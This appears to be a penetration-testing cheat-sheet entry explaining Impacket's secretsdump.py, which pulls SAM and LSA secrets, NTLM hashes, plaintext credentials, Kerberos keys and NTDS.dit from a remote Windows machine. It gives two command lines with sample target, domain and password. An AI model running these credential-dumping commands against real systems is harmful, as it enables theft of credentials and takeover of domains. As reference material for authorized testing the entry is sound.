Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques.
Command Reference:
Target IP: 10.10.10.1
Domain: test.local
Username: test
Password: Welkom01!
Other command:
python3 secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
python3 secretsdump.py test.local/test:Welkom01!@10.10.10.1